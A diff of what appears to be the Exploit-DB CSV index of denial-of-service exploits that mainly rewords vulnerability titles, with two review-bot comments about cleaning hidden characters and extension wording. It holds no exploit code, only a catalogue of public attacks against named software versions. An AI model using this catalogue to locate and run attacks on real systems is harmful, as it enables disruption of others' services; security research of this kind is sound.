24388,exploits/multiple/dos/24388.txt,"aGSM 2.35 Half-Life Server - Info Response Buffer Overflow",2004-08-20,Dimetrius,dos,multiple, 
@@ -3272,7 +3272,7 @@ id,file,description,date,author,type,platform,port 24738,exploits/windows/dos/24738.c,"AlShare Software NetNote Server 2.2 - Remote Denial of Service",2004-11-13,class101,dos,windows, 24741,exploits/windows/dos/24741.txt,"TagScanner 5.1 - Stack Buffer Overflow",2013-03-13,Vulnerability-Lab,dos,windows, 24743,exploits/windows/dos/24743.txt,"Cam2pc 4.6.2 - '.BMP' Image Processing Integer Overflow",2013-03-13,coolkaveh,dos,windows, -24747,exploits/linux/dos/24747.c,"Linux Kernel - 'SCTP_GET_ASSOC_STATS()' Stack Based Buffer Overflow",2013-03-13,"Petr Matousek",dos,linux, +24747,exploits/linux/dos/24747.c,"Linux Kernel - 'SCTP_GET_ASSOC_STATS()' Stack Buffer Overflow",2013-03-13,"Petr Matousek",dos,linux, 24755,exploits/linux/dos/24755.java,"Opera Web browser 7.54 java implementation - Multiple Vulnerabilities (1)",2004-11-19,"Marc Schoenefeld",dos,linux, 24756,exploits/linux/dos/24756.java,"Opera Web browser 7.54 java implementation - Multiple Vulnerabilities (2)",2004-11-19,"Marc Schoenefeld",dos,linux, 24761,exploits/multiple/dos/24761.txt,"Gearbox Software Halo Game 1.x - Client Remote Denial of Service",2004-11-22,"Luigi Auriemma",dos,multiple, 
@@ -3311,7 +3311,7 @@ id,file,description,date,author,type,platform,port 27433,exploits/windows/dos/27433.txt,"Microsoft Internet Explorer 5.0.1 - Script Action Handler Buffer Overflow",2006-03-16,"Michal Zalewski",dos,windows, 24968,exploits/windows/dos/24968.rb,"Mikrotik Syslog Server for Windows 1.15 - Denial of Service (Metasploit)",2013-04-22,xis_one,dos,windows,514 24951,exploits/linux/dos/24951.pl,"ircd-hybrid 8.0.5 - Denial of Service",2013-04-12,kingcope,dos,linux, -24952,exploits/windows/dos/24952.py,"Allied Telesyn TFTP (AT-TFTP) Server/Daemon 2.0 - Stack Based Buffer Overflow Denial of Service",2013-04-12,xis_one,dos,windows,69 +24952,exploits/windows/dos/24952.py,"Allied Telesyn TFTP (AT-TFTP) Server/Daemon 2.0 - Stack Buffer Overflow Denial of Service",2013-04-12,xis_one,dos,windows,69 24962,exploits/windows/dos/24962.txt,"Foxit Reader 5.4.3.x < 5.4.5.0124 - PDF XREF Parsing Denial of Service",2013-04-18,FuzzMyApp,dos,windows, 24966,exploits/windows/dos/24966.txt,"Java Web Start Launcher ActiveX Control - Memory Corruption",2013-04-18,"SEC Consult",dos,windows, 24972,exploits/windows/dos/24972.c,"Flightgear 2.0/2.4 - Remote Format String",2013-04-22,Kurono,dos,windows, 
@@ -3353,7 +3353,7 @@ id,file,description,date,author,type,platform,port 25281,exploits/windows/dos/25281.py,"Apple QuickTime 6.5.1 - PictureViewer Buffer Overflow",2005-03-26,liquid@cyberspace.org,dos,windows, 25287,exploits/linux/dos/25287.c,"Linux Kernel 2.4.x/2.6.x - BlueTooth Signed Buffer Index (PoC)",2005-03-28,"ilja van sprundel",dos,linux, 25295,exploits/hardware/dos/25295.txt,"Huawei SNMPv3 Service - Multiple Buffer Overflow Vulnerabilities",2013-05-07,"Roberto Paleari",dos,hardware, -25303,exploits/linux/dos/25303.txt,"Multiple Vendor Telnet Client - Env_opt_add Heap Based Buffer Overflow",2005-03-28,"Gael Delalleau",dos,linux, +25303,exploits/linux/dos/25303.txt,"Multiple Vendor Telnet Client - Env_opt_add Heap Buffer Overflow",2005-03-28,"Gael Delalleau",dos,linux, 25322,exploits/linux/dos/25322.c,"Linux Kernel 2.6.10 - File Lock Local Denial of Service",2005-03-30,ChoiX,dos,linux, 25326,exploits/windows/dos/25326.txt,"RUMBA 7.3/7.4 - Profile Handling Multiple Buffer Overflow Vulnerabilities",2005-04-01,"Bahaa Naamneh",dos,windows, 25329,exploits/windows/dos/25329.cfg,"Star Wars Jedi Knight: Jedi Academy 1.0.11 - Buffer Overflow",2005-04-02,"Luigi Auriemma",dos,windows, 
@@ -3390,7 +3390,7 @@ id,file,description,date,author,type,platform,port 25699,exploits/windows/dos/25699.txt,"Gearbox Software Halo Game Server 1.06/1.07 - Infinite Loop Denial of Service",2005-05-24,"Luigi Auriemma",dos,windows, 25711,exploits/hardware/dos/25711.txt,"Sony Ericsson P900 Beamer - Malformed File Name Handling Denial of Service",2005-05-26,"Marek Bialoglowy",dos,hardware, 25712,exploits/windows/dos/25712.txt,"SIEMENS Solid Edge ST4/ST5 SEListCtrlX - ActiveX SetItemReadOnly Arbitrary Memory Rewrite Remote Code Execution",2013-05-26,rgod,dos,windows, -25714,exploits/windows/dos/25714.txt,"SAS Integration Technologies Client 9.31_M1 'SASspk.dll' - Stack Based Overflow",2013-05-26,LiquidWorm,dos,windows, +25714,exploits/windows/dos/25714.txt,"SAS Integration Technologies Client 9.31_M1 'SASspk.dll' - Stack Overflow",2013-05-26,LiquidWorm,dos,windows, 25719,exploits/windows/dos/25719.txt,"Trend Micro DirectPass 1.5.0.1060 - Multiple Software Vulnerabilities",2013-05-26,Vulnerability-Lab,dos,windows, 25736,exploits/hardware/dos/25736.txt,"Nokia 9500 - vCard Viewer Remote Denial of Service",2005-05-26,"Marek Bialoglowy",dos,hardware, 25737,exploits/windows/dos/25737.txt,"Microsoft Windows 98SE - 'User32.dll' Icon Handling Denial of Service",2005-05-26,klistas,dos,windows, 
@@ -3453,7 +3453,7 @@ id,file,description,date,author,type,platform,port 26548,exploits/hardware/dos/26548.pl,"Cisco PIX - TCP SYN Packet Denial of Service",2005-11-22,"Janis Vizulis",dos,hardware, 26555,exploits/windows/dos/26555.txt,"Opera 12.15 - vtable Corruption",2013-07-02,echo,dos,windows, 26557,exploits/windows/dos/26557.txt,"Winamp 5.63 - Invalid Pointer Dereference",2013-07-02,"Julien Ahrens",dos,windows, -26558,exploits/windows/dos/26558.txt,"Winamp 5.63 - Stack Based Buffer Overflow",2013-07-02,"Julien Ahrens",dos,windows, +26558,exploits/windows/dos/26558.txt,"Winamp 5.63 - Stack Buffer Overflow",2013-07-02,"Julien Ahrens",dos,windows, 26575,exploits/windows/dos/26575.txt,"MailEnable 1.1/1.7 - IMAP Rename Request Remote Denial of Service",2005-11-23,"Josh Zlatin-Amishav",dos,windows, 26578,exploits/windows/dos/26578.py,"Realtek Sound Manager AvRack - '.wav' Crash (PoC)",2013-07-03,Asesino04,dos,windows, 26601,exploits/linux/dos/26601.pl,"Unalz 0.x - Archive Filename Buffer Overflow",2005-11-28,"Ulf Harnhammar",dos,linux, 
@@ -3549,7 +3549,7 @@ id,file,description,date,author,type,platform,port 27670,exploits/linux/dos/27670.txt,"Xine 0.9/1.0 - Playlist Handling Remote Format String",2006-04-18,c0ntexb,dos,linux, 27700,exploits/windows/dos/27700.py,"VideoLAN VLC Media Player 2.0.8 - '.m3u' Local Crash (PoC)",2013-08-19,Asesino04,dos,windows, 27714,exploits/osx/dos/27714.txt,"Apple Mac OSX 10.x - LZWDecodeVector '.tiff' Overflow",2006-04-20,"Tom Ferris",dos,osx, -27715,exploits/osx/dos/27715.txt,"Apple Mac OSX 10.x - '.zip' BOMStackPop()' Overflow",2006-04-20,"Tom Ferris",dos,osx, +27715,exploits/osx/dos/27715.txt,"Apple Mac OSX 10.x - '.zip' 'BOMStackPop()' Overflow",2006-04-20,"Tom Ferris",dos,osx, 27723,exploits/linux/dos/27723.txt,"Yukihiro Matsumoto Ruby 1.x - XMLRPC Server Denial of Service",2006-04-21,"Tanaka Akira",dos,linux, 27730,exploits/multiple/dos/27730.py,"Lotus Domino 7.0.x/8.0/8.5 - LDAP Message Remote Denial of Service",2006-04-24,"Evgeny Legerov",dos,multiple, 27745,exploits/windows/dos/27745.txt,"Outlook Express 5.5/6.0 / Windows Mail - MHTML URI Handler Information Disclosure",2006-04-27,codedreamer,dos,windows, 
@@ -3709,7 +3709,7 @@ id,file,description,date,author,type,platform,port 29310,exploits/multiple/dos/29310.txt,"WikiReader 1.12 - URL Field Local Buffer Overflow",2006-12-22,"Umesh Wanve",dos,multiple, 29473,exploits/linux/dos/29473.txt,"Squid Proxy 2.5/2.6 - FTP URI Remote Denial of Service",2007-01-16,"David Duncan Ross Palmer",dos,linux, 29362,exploits/multiple/dos/29362.pl,"DB Hub 0.3 - Remote Denial of Service",2006-12-27,"Critical Security",dos,multiple, -40960,exploits/windows/dos/40960.svg,"Microsoft Internet Explorer 11 - MSHTML CPaste­Command::Convert­Bitmapto­Png Heap-Based Buffer Overflow (MS14-056)",2016-12-22,Skylined,dos,windows, +40960,exploits/windows/dos/40960.svg,"Microsoft Internet Explorer 11 - MSHTML CPaste­Command::Convert­Bitmapto­Png Heap Buffer Overflow (MS14-056)",2016-12-22,Skylined,dos,windows, 29387,exploits/windows/dos/29387.pl,"Plogue Sforzando 1.665 - Buffer Overflow (SEH) (PoC)",2013-11-03,"Mike Czumak",dos,windows, 29399,exploits/linux/dos/29399.txt,"Multiple PDF Readers - Multiple Remote Buffer Overflows",2007-01-06,LMH,dos,linux, 29402,exploits/hardware/dos/29402.txt,"Packeteer PacketShaper 8.0 - Multiple Buffer Overflow Denial of Service Vulnerabilities",2007-01-08,kian.mohageri,dos,hardware, 
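Review bot: the 40960 description is edited here but still appears to carry soft-hyphen characters inside "CPasteCommand::ConvertBitmaptoPng", so a plain-text search of the CSV for that class or method name will not match this row. Since the line is already being rewritten for "Heap-Based" to "Heap", strip the invisible characters in the same change so the identifier is stored as plain ASCII.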
@@ -3859,7 +3859,7 @@ id,file,description,date,author,type,platform,port 30550,exploits/windows/dos/30550.php,"Ofilter Player 1.1 - '.wav' Integer Division by Zero",2013-12-28,"Osanda Malith",dos,windows, 30566,exploits/multiple/dos/30566.txt,"Alien Arena 2007 6.10 - Multiple Remote Vulnerabilities",2007-09-05,"Luigi Auriemma",dos,multiple, 30574,exploits/multiple/dos/30574.txt,"CellFactor REvolution 1.03 - Multiple Remote Code Execution Vulnerabilities",2007-09-10,"Luigi Auriemma",dos,multiple, -30578,exploits/linux/dos/30578.txt,"MPlayer 1.0 - AVIHeader.C Heap Based Buffer Overflow",2007-09-12,"Code Audit Labs",dos,linux, +30578,exploits/linux/dos/30578.txt,"MPlayer 1.0 - AVIHeader.C Heap Buffer Overflow",2007-09-12,"Code Audit Labs",dos,linux, 30579,exploits/linux/dos/30579.txt,"Media Player Classic 6.4.9 - Malformed AVI Header Multiple Remote Vulnerabilities",2007-09-12,"Code Audit Labs",dos,linux, 32400,exploits/multiple/dos/32400.html,"Foxmail Email Client 6.5 - 'mailto' Buffer Overflow",2008-09-22,sebug,dos,multiple, 31913,exploits/windows/dos/31913.pl,"Music AlarmClock 2.1.0 - '.m3u' Crash (PoC)",2014-02-26,"Gabor Seljan",dos,windows, 
@@ -3911,8 +3911,8 @@ id,file,description,date,author,type,platform,port 30898,exploits/linux/dos/30898.pl,"Common UNIX Printing System 1.2/1.3 SNMP - 'asn1_get_string()' Remote Buffer Overflow",2007-11-06,wei_wang,dos,linux, 30902,exploits/linux/dos/30902.c,"Linux Kernel 2.6.22 - IPv6 Hop-By-Hop Header Remote Denial of Service",2007-12-19,"Clemens Kurtenbach",dos,linux, 30903,exploits/multiple/dos/30903.c,"id3lib ID3 Tags - Buffer Overflow",2007-12-19,"Luigi Auriemma",dos,multiple, -30906,exploits/multiple/dos/30906.c,"ProWizard 4 PC 1.62 - Multiple Remote Stack Based Buffer Overflow Vulnerabilities",2007-12-19,"Luigi Auriemma",dos,multiple, -30922,exploits/multiple/dos/30922.c,"WinUAE 1.4.4 - 'zfile.c' Stack Based Buffer Overflow",2007-12-21,"Luigi Auriemma",dos,multiple, +30906,exploits/multiple/dos/30906.c,"ProWizard 4 PC 1.62 - Multiple Remote Stack Buffer Overflow Vulnerabilities",2007-12-19,"Luigi Auriemma",dos,multiple, +30922,exploits/multiple/dos/30922.c,"WinUAE 1.4.4 - 'zfile.c' Stack Buffer Overflow",2007-12-21,"Luigi Auriemma",dos,multiple, 30956,exploits/linux/dos/30956.txt,"CoolPlayer 2.17 - 'CPLI_ReadTag_OGG()' Buffer Overflow",2007-12-28,"Luigi Auriemma",dos,linux, 30934,exploits/windows/dos/30934.txt,"Total Player 3.0 - '.m3u' File Denial of Service",2007-12-25,"David G.M.",dos,windows, 30936,exploits/windows/dos/30936.html,"AOL Picture Editor 'YGPPicEdit.dll' ActiveX Control 9.5.1.8 - Multiple Buffer Overflow Vulnerabilities",2007-12-25,"Elazar Broad",dos,windows, 
@@ -3940,7 +3940,7 @@ id,file,description,date,author,type,platform,port 31148,exploits/multiple/dos/31148.txt,"Opium OPI Server and CyanPrintIP - Format String / Denial of Service",2008-02-11,"Luigi Auriemma",dos,multiple, 31150,exploits/multiple/dos/31150.txt,"RPM Remote Print Manager 4.5.1 - Service Remote Buffer Overflow",2008-02-11,"Luigi Auriemma",dos,multiple, 31306,exploits/hardware/dos/31306.txt,"Nortel UNIStim IP Phone - Remote Ping Denial of Service",2008-02-26,sipherr,dos,hardware, -31307,exploits/android/dos/31307.py,"Google Android Web Browser - '.GIF' File Heap Based Buffer Overflow",2008-03-04,"Alfredo Ortega",dos,android, +31307,exploits/android/dos/31307.py,"Google Android Web Browser - '.GIF' File Heap Buffer Overflow",2008-03-04,"Alfredo Ortega",dos,android, 31168,exploits/windows/dos/31168.pl,"NCH Software Express Burn Plus 4.68 - '.EBP' Project File Buffer Overflow",2014-01-24,LiquidWorm,dos,windows, 31176,exploits/windows/dos/31176.html,"MW6 Technologies Aztec - ActiveX 'Data' Buffer Overflow",2014-01-24,"Pedro Ribeiro",dos,windows, 31177,exploits/windows/dos/31177.html,"MW6 Technologies Datamatrix - ActiveX 'Data' Buffer Overflow",2014-01-24,"Pedro Ribeiro",dos,windows, 
@@ -3951,7 +3951,7 @@ id,file,description,date,author,type,platform,port 31205,exploits/windows/dos/31205.txt,"Sami FTP Server 2.0.x - Multiple Commands Remote Denial of Service Vulnerabilities",2008-02-15,Cod3rZ,dos,windows, 31218,exploits/linux/dos/31218.txt,"freeSSHd 1.2 - 'SSH2_MSG_NEWKEYS' Packet Remote Denial of Service",2008-02-17,"Luigi Auriemma",dos,linux, 31220,exploits/linux/dos/31220.py,"MP3Info 0.8.5a - Buffer Overflow",2014-01-27,jsacco,dos,linux, -31222,exploits/windows/dos/31222.py,"Oracle Outside In MDB - File Parsing Stack Based Buffer Overflow (PoC)",2014-01-27,Citadelo,dos,windows, +31222,exploits/windows/dos/31222.py,"Oracle Outside In MDB - File Parsing Stack Buffer Overflow (PoC)",2014-01-27,Citadelo,dos,windows, 31223,exploits/multiple/dos/31223.txt,"Mozilla Thunderbird 17.0.6 - Input Validation Filter Bypass",2014-01-27,Vulnerability-Lab,dos,multiple, 31232,exploits/multiple/dos/31232.txt,"Foxit WAC Remote Access Server 2.0 Build 3503 - Heap Buffer Overflow",2008-02-16,"Luigi Auriemma",dos,multiple, 40356,exploits/multiple/dos/40356.txt,"Adobe Flash - Method Calls Use-After-Free",2016-09-08,"Google Security Research",dos,multiple, 
@@ -4021,7 +4021,7 @@ id,file,description,date,author,type,platform,port 31818,exploits/windows/dos/31818.sh,"vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (1)",2008-05-21,"Martin Nagy",dos,windows, 31819,exploits/windows/dos/31819.pl,"vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (2)",2008-05-21,"Praveen Darshanam",dos,windows, 31856,exploits/windows/dos/31856.html,"CA Internet Security Suite - 'UmxEventCli.dll' ActiveX Control Arbitrary File Overwrite",2008-05-28,Nine:Situations:Group,dos,windows, -31872,exploits/multiple/dos/31872.py,"NASA Ames Research Center BigView 1.8 - '.PNM' Stack Based Buffer Overflow",2008-06-04,"Alfredo Ortega",dos,multiple, +31872,exploits/multiple/dos/31872.py,"NASA Ames Research Center BigView 1.8 - '.PNM' Stack Buffer Overflow",2008-06-04,"Alfredo Ortega",dos,multiple, 31876,exploits/windows/dos/31876.xml,"HP Instant Support 1.0.22 - 'HPISDataManager.dll StartApp' ActiveX Control Insecure Method",2008-06-03,"Dennis Rand",dos,windows, 31877,exploits/windows/dos/31877.xml,"HP Instant Support 1.0.22 - 'HPISDataManager.dll RegistryString' Buffer Overflow",2008-06-04,"Dennis Rand",dos,windows, 31878,exploits/windows/dos/31878.xml,"HP Instant Support 1.0.22 - 'HPISDataManager.dll' ActiveX Control Arbitrary File Creation",2008-06-03,"Dennis Rand",dos,windows, 
@@ -4049,7 +4049,7 @@ id,file,description,date,author,type,platform,port 32006,exploits/multiple/dos/32006.txt,"Wireshark 1.0.0 - Multiple Denial of Service Vulnerabilities",2008-06-30,"Noam Rathus",dos,multiple, 32009,exploits/unix/dos/32009.txt,"QNX Neutrino RTOS 6.3 - 'phgrafx' Local Buffer Overflow",2008-07-01,"Filipe Balestra",dos,unix, 32018,exploits/linux/dos/32018.txt,"Firefox / Evince / EoG / GIMP - '.SVG' File Processing Denial of Service",2008-07-08,"Kristian Hermansen",dos,linux, -32019,exploits/linux/dos/32019.txt,"FFmpeg libavformat - 'psxstr.c' STR Data Heap Based Buffer Overflow",2008-07-09,astrange,dos,linux, +32019,exploits/linux/dos/32019.txt,"FFmpeg libavformat - 'psxstr.c' STR Data Heap Buffer Overflow",2008-07-09,astrange,dos,linux, 32054,exploits/windows/dos/32054.py,"MediaMonkey 3.0.3 - URI Handling Multiple Denial of Service Vulnerabilities",2008-07-16,Shinnok,dos,windows, 32056,exploits/windows/dos/32056.py,"BitComet 1.02 - URI Handling Remote Denial of Service",2008-07-16,Shinnok,dos,windows, 32086,exploits/multiple/dos/32086.c,"SWAT 4 - Multiple Denial of Service Vulnerabilities",2008-07-20,"Luigi Auriemma",dos,multiple, 
@@ -4060,7 +4060,7 @@ id,file,description,date,author,type,platform,port 32127,exploits/multiple/dos/32127.txt,"Unreal Tournament 3 - Memory Corruption (Denial of Service)",2008-07-30,"Luigi Auriemma",dos,multiple, 32136,exploits/osx/dos/32136.html,"Apple Mac OSX 10.x - CoreGraphics Multiple Memory Corruption Vulnerabilities",2008-07-31,"Michal Zalewski",dos,osx, 32192,exploits/multiple/dos/32192.txt,"Combat Evolved 1.0.7.0615 - Multiple Denial of Service Vulnerabilities",2008-08-06,"Luigi Auriemma",dos,multiple, -32193,exploits/multiple/dos/32193.txt,"OpenVms 8.3 Finger Service - Stack Based Buffer Overflow",2008-08-07,"Shaun Colley",dos,multiple, +32193,exploits/multiple/dos/32193.txt,"OpenVms 8.3 Finger Service - Stack Buffer Overflow",2008-08-07,"Shaun Colley",dos,multiple, 32194,exploits/multiple/dos/32194.txt,"Noticeware Email Server 4.6 - NG LOGIN Messages Denial of Service",2008-08-06,Antunes,dos,multiple, 32195,exploits/multiple/dos/32195.txt,"Qbik WinGate 6.2.2 - LIST Command Remote Denial of Service",2008-08-08,Antunes,dos,multiple, 32208,exploits/multiple/dos/32208.txt,"Oracle VM VirtualBox - 3D Acceleration Multiple Vulnerabilities",2014-03-12,"Core Security",dos,multiple, 
@@ -4068,7 +4068,7 @@ id,file,description,date,author,type,platform,port 32229,exploits/windows/dos/32229.txt,"hMAilServer 4.4.1 - IMAP Command Remote Denial of Service",2008-08-12,Antunes,dos,windows, 32248,exploits/linux/dos/32248.txt,"Yelp 2.23.1 - Invalid URI Format String",2008-08-13,"Aaron Grattafiori",dos,linux, 32256,exploits/windows/dos/32256.py,"Ipswitch WS_FTP Home/Professional 8.0 - WS_FTP Client Format String",2008-08-17,securfrog,dos,windows, -32332,exploits/windows/dos/32332.txt,"Free Download Manager - Stack Based Buffer Overflow",2014-03-17,"Julien Ahrens",dos,windows,80 +32332,exploits/windows/dos/32332.txt,"Free Download Manager - Stack Buffer Overflow",2014-03-17,"Julien Ahrens",dos,windows,80 32292,exploits/linux/dos/32292.rb,"Ruby 1.9 - REXML Remote Denial of Service",2008-08-23,"Luka Treiber",dos,linux, 32294,exploits/windows/dos/32294.html,"Microsoft Windows Media Services 'nskey.dll' 4.1 - ActiveX Control Remote Buffer Overflow",2008-08-22,"Jeremy Brown",dos,windows, 32304,exploits/linux/dos/32304.txt,"RedHat 8/9 - Directory Server Crafted Search Pattern Denial of Service",2008-08-27,"Ulf Weltman",dos,linux, 
@@ -4355,7 +4355,7 @@ id,file,description,date,author,type,platform,port 34442,exploits/windows/dos/34442.html,"Kylinsoft InstantGet 2.08 - ActiveX Control 'ShowBar' Method Buffer Overflow",2009-09-19,the_Edit0r,dos,windows, 34457,exploits/multiple/dos/34457.txt,"Sniper Elite 1.0 - Null Pointer Dereference Denial of Service",2009-08-14,"Luigi Auriemma",dos,multiple, 34458,exploits/windows/dos/34458.html,"Microsoft Internet Explorer - Memory Corruption (PoC) (MS14-029)",2014-08-28,PhysicalDrive0,dos,windows, -34460,exploits/windows/dos/34460.py,"Sonique 2.0 - '.xpl' Remote Stack Based Buffer Overflow",2010-08-12,"Hamza_hack_dz & Black-liondz1",dos,windows, +34460,exploits/windows/dos/34460.py,"Sonique 2.0 - '.xpl' Remote Stack Buffer Overflow",2010-08-12,"Hamza_hack_dz & Black-liondz1",dos,windows, 34463,exploits/windows/dos/34463.py,"HTML Help Workshop 1.4 - Buffer Overflow (SEH)",2014-08-29,"Moroccan Kingdom (MKD)",dos,windows, 34480,exploits/windows/dos/34480.py,"Xilisoft Video Converter 3.1.8.0720b - '.ogg' Buffer Overflow",2010-08-16,"Praveen Darshanam",dos,windows, 34502,exploits/windows/dos/34502.py,"Serveez 0.1.7 - 'If-Modified-Since' Header Stack Buffer Overflow",2009-08-09,"lvac lvac",dos,windows, 
@@ -4453,7 +4453,7 @@ id,file,description,date,author,type,platform,port 35613,exploits/multiple/dos/35613.py,"TOTVS ERP Microsiga Protheus 8/10 - Memory Corruption (Denial of Service)",2011-04-13,waKKu,dos,multiple, 35622,exploits/windows/dos/35622.txt,"Wickr Desktop 2.2.1 Windows - Denial of Service",2014-12-27,Vulnerability-Lab,dos,windows, 35637,exploits/android/dos/35637.py,"WhatsApp 2.11.476 (Android) - Remote Reboot/Crash App (Denial of Service)",2014-12-28,"Daniel Godoy",dos,android, -35656,exploits/windows/dos/35656.pl,"eXPert PDF 7.0.880.0 - '.pj' Heap Based Buffer Overflow",2011-04-25,KedAns-Dz,dos,windows, +35656,exploits/windows/dos/35656.pl,"eXPert PDF 7.0.880.0 - '.pj' Heap Buffer Overflow",2011-04-25,KedAns-Dz,dos,windows, 35654,exploits/windows/dos/35654.py,"AT-TFTP Server 1.8 - 'Read' Request Remote Denial of Service",2011-04-25,"Antu Sanadi",dos,windows, 35725,exploits/multiple/dos/35725.pl,"Perl 5.10 - Multiple Null Pointer Dereference Denial of Service Vulnerabilities",2011-05-03,"Jonathan Brossard",dos,multiple, 35738,exploits/linux/dos/35738.php,"Apache 1.4/2.2.x - APR 'apr_fnmatch()' Denial of Service",2011-05-12,"Maksymilian Arciemowicz",dos,linux, 
@@ -4675,13 +4675,13 @@ id,file,description,date,author,type,platform,port 37876,exploits/lin_x86-64/dos/37876.txt,"Adobe Flash - XMLSocket Destructor Not Cleared Before Setting User Data in connect",2015-08-19,"Google Security Research",dos,lin_x86-64, 37877,exploits/multiple/dos/37877.txt,"Adobe Flash - textfield.gridFitType Use-After-Free",2015-08-19,"Google Security Research",dos,multiple, 37878,exploits/multiple/dos/37878.txt,"Adobe Flash - FileReference Class Type Confusion",2015-08-19,"Google Security Research",dos,multiple, -37879,exploits/lin_x86-64/dos/37879.txt,"Adobe Flash - Heap Based Buffer Overflow Loading '.FLV' File with Nellymoser Audio Codec",2015-08-19,"Google Security Research",dos,lin_x86-64, -37880,exploits/lin_x86-64/dos/37880.txt,"Adobe Flash - Heap Based Buffer Overflow Due to Indexing Error When Loading FLV File",2015-08-19,"Google Security Research",dos,lin_x86-64, +37879,exploits/lin_x86-64/dos/37879.txt,"Adobe Flash - Heap Buffer Overflow Loading '.FLV' File with Nellymoser Audio Codec",2015-08-19,"Google Security Research",dos,lin_x86-64, +37880,exploits/lin_x86-64/dos/37880.txt,"Adobe Flash - Heap Buffer Overflow Due to Indexing Error When Loading FLV File",2015-08-19,"Google Security Research",dos,lin_x86-64, 37881,exploits/win_x86/dos/37881.txt,"Adobe Flash - Shared Object Type Confusion",2015-08-19,"Google Security Research",dos,win_x86, 37882,exploits/multiple/dos/37882.txt,"Adobe Flash - Overflow in ID3 Tag Parsing",2015-08-19,"Google Security Research",dos,multiple, 37883,exploits/windows/dos/37883.txt,"Adobe Flash AS2 - textfield.filters Use-After-Free (3)",2015-08-19,bilou,dos,windows, 37884,exploits/windows/dos/37884.txt,"Adobe Flash - Heap Use-After-Free in SurfaceFilterList::C​reateFromScriptAtom",2015-08-19,bilou,dos,windows, -37893,exploits/windows/dos/37893.py,"Valhala Honeypot 1.8 - Stack Based Buffer Overflow",2015-08-20,Un_N0n,dos,windows,21 +37893,exploits/windows/dos/37893.py,"Valhala Honeypot 1.8 - Stack Buffer 
Overflow",2015-08-20,Un_N0n,dos,windows,21 37897,exploits/linux/dos/37897.html,"Midori Browser 0.3.2 - Denial of Service",2012-09-27,"Ryuzaki Lawlet",dos,linux, 37905,exploits/windows/dos/37905.rb,"PowerTCP WebServer for - ActiveX Denial of Service",2012-09-28,catatonicprime,dos,windows, 37908,exploits/windows/dos/37908.py,"Konica Minolta FTP Utility 1.0 - Remote Denial of Service (PoC)",2015-08-21,"Shankar Damodaran",dos,windows,21 
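Review bot: The two Adobe Flash descriptions rewritten in the @@ -4675,13 hunk disagree on how the extension is written: 37879 reads "Loading '.FLV' File" while 37880 reads "When Loading FLV File". Both lines are already being touched, so normalize 37880 to the quoted '.FLV' form that the rest of the index uses for file extensions, so that a search on the quoted extension returns both entries.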
@@ -4704,12 +4704,12 @@ id,file,description,date,author,type,platform,port 37954,exploits/windows/dos/37954.py,"Mock SMTP Server 1.0 - Remote Crash (PoC)",2015-08-24,"Shankar Damodaran",dos,windows,25 37957,exploits/windows/dos/37957.txt,"GOM Audio 2.0.8 - '.gas' Crash (PoC)",2015-08-24,Un_N0n,dos,windows, 37966,exploits/windows/dos/37966.txt,"Microsoft Office 2007 - OneTableDocumentStream Invalid Object",2015-08-25,"Google Security Research",dos,windows, -37967,exploits/windows/dos/37967.txt,"Microsoft Office 2007 - Malformed Document Stack Based Buffer Overflow",2015-08-25,"Google Security Research",dos,windows, +37967,exploits/windows/dos/37967.txt,"Microsoft Office 2007 - Malformed Document Stack Buffer Overflow",2015-08-25,"Google Security Research",dos,windows, 37976,exploits/windows/dos/37976.py,"VideoLAN VLC Media Player 2.2.1 - m3u8/m3u Crash (PoC)",2015-08-26,"Naser Farhadi",dos,windows, 37980,exploits/windows/dos/37980.pl,"Microsoft Excel - Denial of Service",2012-10-11,"Jean Pascal Pereira",dos,windows, 37981,exploits/windows/dos/37981.pl,"Microsoft Paint 5.1 - '.bmp' Denial of Service",2012-10-27,coolkaveh,dos,windows, 37984,exploits/windows/dos/37984.pl,"KMPlayer 3.0.0.1440 - '.avi' File Local Denial of Service",2012-10-26,Am!r,dos,windows, -37986,exploits/windows/dos/37986.txt,"Xion Audio Player 1.5 build 155 - Stack Based Buffer Overflow",2015-08-27,Un_N0n,dos,windows, +37986,exploits/windows/dos/37986.txt,"Xion Audio Player 1.5 build 155 - Stack Buffer Overflow",2015-08-27,Un_N0n,dos,windows, 37990,exploits/multiple/dos/37990.txt,"QEMU - Programmable Interrupt Timer Controller Heap Overflow",2015-08-27,"Google Security Research",dos,multiple, 37997,exploits/ios/dos/37997.txt,"Photo Transfer (2) 1.0 iOS - Denial of Service",2015-08-28,Vulnerability-Lab,dos,ios,3030 38014,exploits/windows/dos/38014.py,"Sysax Multi Server 6.40 - SSH Component Denial of Service",2015-08-29,3unnym00n,dos,windows,22 
@@ -4719,7 +4719,7 @@ id,file,description,date,author,type,platform,port 38032,exploits/ios/dos/38032.pl,"Viber 4.2.0 - Non-Printable Characters Handling Denial of Service",2015-08-31,"Mohammad Reza Espargham",dos,ios, 38038,exploits/multiple/dos/38038.txt,"Splunk 4.3.1 - Denial of Service",2012-11-19,"Alexander Klink",dos,multiple, 38052,exploits/windows/dos/38052.py,"Ricoh DC (SR10) 1.1.0.8 - Denial of Service",2015-09-01,j2x6,dos,windows,21 -38053,exploits/windows/dos/38053.txt,"Mpxplay MultiMedia Commander 2.00a - '.m3u' Stack Based Buffer Overflow",2015-09-01,Un_N0n,dos,windows, +38053,exploits/windows/dos/38053.txt,"Mpxplay MultiMedia Commander 2.00a - '.m3u' Stack Buffer Overflow",2015-09-01,Un_N0n,dos,windows, 38054,exploits/windows/dos/38054.txt,"SiS Windows VGA Display Manager 6.14.10.3930 - Write-What-Where (PoC)",2015-09-01,KoreLogic,dos,windows, 38055,exploits/windows/dos/38055.txt,"XGI Windows VGA Display Manager 6.14.10.1090 - Arbitrary Write (PoC)",2015-09-01,KoreLogic,dos,windows, 38059,exploits/bsd/dos/38059.c,"OpenBSD 4.x - Portmap Remote Denial of Service",2012-11-22,auto236751,dos,bsd, 
